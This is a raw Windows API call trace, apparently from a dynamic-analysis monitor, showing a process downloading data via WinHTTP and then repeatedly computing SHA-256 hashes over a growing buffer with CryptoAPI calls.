	[0187.335] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0xdb0020, Size=0x8bf00) returned 0xe40020
	[0187.347] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0xec9f1f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0xec9f1f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.347] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.347] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0xe40020, Size=0x8df00) returned 0xdb0020
	[0187.359] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0xe3bf1f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0xe3bf1f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.359] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0187.360] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0xdb0020, Size=0x8ff00) returned 0xe40020
	[0187.369] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0xecdf1f, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0xecdf1f*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0187.369] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0xcc1) returned 1
	[0187.371] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0xe40020, Size=0x90bc0) returned 0x2490020
	[0187.379] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x251ff1f, dwNumberOfBytesToRead=0xcc1, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x251ff1f*, lpdwNumberOfBytesRead=0x12822c*=0xcc1) returned 1
	[0187.380] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x0) returned 1
	[0187.380] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xc0) returned 0x22ac150
	[0187.380] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x272d4d0
	[0187.380] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.381] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.381] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0187.381] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.381] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310e38
	[0187.381] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310e38, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310e38, pdwDataLen=0x128aac) returned 1
	[0187.381] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.381] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.381] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.381] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.381] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0187.381] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.381] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310e88
	[0187.381] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310e88, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310e88, pdwDataLen=0x128aac) returned 1
	[0187.381] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.381] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.381] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.382] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.382] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0187.382] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.382] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310eb0
	[0187.382] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310eb0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310eb0, pdwDataLen=0x128aac) returned 1
	[0187.382] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.382] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.382] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.382] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.382] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0187.382] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.382] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310ed8
	[0187.382] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310ed8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310ed8, pdwDataLen=0x128aac) returned 1
	[0187.382] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.382] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.382] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.383] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.383] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0187.383] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.383] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310f00
	[0187.383] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310f00, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310f00, pdwDataLen=0x128aac) returned 1
	[0187.383] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.383] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.383] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.383] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.383] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0187.383] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.383] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310f28
	[0187.383] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310f28, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310f28, pdwDataLen=0x128aac) returned 1
	[0187.383] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.383] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.383] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.384] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.384] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0187.384] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.384] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310f50
	[0187.384] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310f50, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310f50, pdwDataLen=0x128aac) returned 1
	[0187.384] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.384] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.384] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.384] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.384] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0187.384] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.384] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310f78
	[0187.384] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310f78, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310f78, pdwDataLen=0x128aac) returned 1
	[0187.384] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.384] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.384] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.385] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.385] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0187.385] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.385] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310fa0
	[0187.385] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310fa0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310fa0, pdwDataLen=0x128aac) returned 1
	[0187.385] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.385] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.385] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.385] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.385] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0187.385] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.385] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23064b0
	[0187.385] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23064b0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23064b0, pdwDataLen=0x128aac) returned 1
	[0187.385] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.385] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.385] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.386] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.386] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0187.386] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.386] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23065c8
	[0187.386] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23065c8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23065c8, pdwDataLen=0x128aac) returned 1
	[0187.386] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.386] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.386] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.386] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.386] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0187.386] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.386] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306460
	[0187.386] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306460, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306460, pdwDataLen=0x128aac) returned 1
	[0187.386] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.386] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.386] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.387] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.387] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0187.387] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.387] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23065f0
	[0187.387] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23065f0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23065f0, pdwDataLen=0x128aac) returned 1
	[0187.387] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.387] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.387] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.387] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.387] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0187.387] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.387] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9010
	[0187.387] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x22a9010, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x22a9010, pdwDataLen=0x128aac) returned 1
	[0187.387] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.387] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.387] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.388] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.388] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0187.388] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.388] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a89d0
	[0187.388] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x22a89d0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x22a89d0, pdwDataLen=0x128aac) returned 1
	[0187.388] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.388] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.388] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.388] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.388] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0187.388] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.388] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a8e30
	[0187.388] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x22a8e30, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x22a8e30, pdwDataLen=0x128aac) returned 1
	[0187.388] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.388] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.388] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.389] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.389] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0187.389] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.389] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24c690
	[0187.389] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x24c690, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x24c690, pdwDataLen=0x128aac) returned 1
	[0187.389] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.389] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.389] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.389] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.389] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0187.389] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.389] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d870
	[0187.389] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d870, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d870, pdwDataLen=0x128aac) returned 1
	[0187.389] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.389] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.389] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.390] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.390] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0187.390] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.390] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e4f0
	[0187.390] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272e4f0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e4f0, pdwDataLen=0x128aac) returned 1
	[0187.390] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.390] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.390] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.390] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.390] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0187.390] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.390] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e518
	[0187.390] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272e518, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e518, pdwDataLen=0x128aac) returned 1
	[0187.390] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.390] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.390] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.391] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.391] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0187.391] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.391] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e540
	[0187.391] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272e540, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e540, pdwDataLen=0x128aac) returned 1
	[0187.391] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.391] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.391] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.391] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.391] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0187.391] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.391] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e568
	[0187.391] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272e568, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e568, pdwDataLen=0x128aac) returned 1
	[0187.391] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.391] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.391] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.392] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.392] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0187.392] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.392] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e590
	[0187.392] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272e590, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e590, pdwDataLen=0x128aac) returned 1
